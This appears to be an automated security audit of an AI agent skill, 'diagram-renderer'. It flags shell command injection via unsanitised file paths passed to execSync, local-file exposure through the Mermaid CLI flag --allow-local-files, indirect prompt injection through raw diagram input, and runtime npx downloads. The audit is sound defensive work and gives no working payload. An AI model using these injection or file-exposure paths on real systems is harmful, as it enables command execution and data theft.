diagram-renderer
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill executes shell commands using
execSyncinsrc/index.tsandsrc/lib.ts. The variablesmmdPathandoutputPathare interpolated directly into the command string. Since these paths are derived from user-controlled arguments (--input,--out), an attacker can inject arbitrary shell commands by including metacharacters (e.g.,;,&,|) in the filenames. - [DATA_EXFILTRATION]: In
src/lib.ts, therenderDiagramfunction uses the--allow-local-filesflag with the Mermaid CLI. This allows the renderer to access the local filesystem. Because the skill accepts raw diagram code through theelements.diagramfield, a malicious actor could provide a diagram that references sensitive local files (e.g., using CSS or image tags), leading to their exposure in the rendered output. - [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it accepts raw Mermaid diagram code in the
elements.diagramfield without sanitization. - Ingestion points: The input JSON file processed in
src/index.tsandsrc/lib.tsvia theADFinterface. - Boundary markers: No markers or delimiters are used to encapsulate user-provided diagram content.
- Capability inventory: Use of
execSyncfor shell execution and file system access for reading/writing artifacts. - Sanitization: No sanitization or filtering is applied to the diagram content or the command-line arguments.
- [EXTERNAL_DOWNLOADS]: The skill downloads the official
@mermaid-js/mermaid-clipackage from the NPM registry using thenpx -ycommand during execution.
Recommendations
- AI detected serious security threats
Audit Metadata